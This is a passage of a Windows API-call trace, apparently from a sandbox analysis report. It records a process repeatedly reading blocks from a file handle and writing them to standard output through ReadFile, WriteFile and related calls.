lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.317] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.317] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.318] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.318] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.320] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.320] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.321] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.321] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.323] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.323] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.324] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.324] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] GetFileType (hFile=0x50) returned 0x1 [0151.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.325] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.326] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.326] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] GetFileType (hFile=0x50) returned 0x1 [0151.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.326] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.327] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.327] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.327] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.328] GetFileType (hFile=0x50) returned 0x1 [0151.328] _get_osfhandle 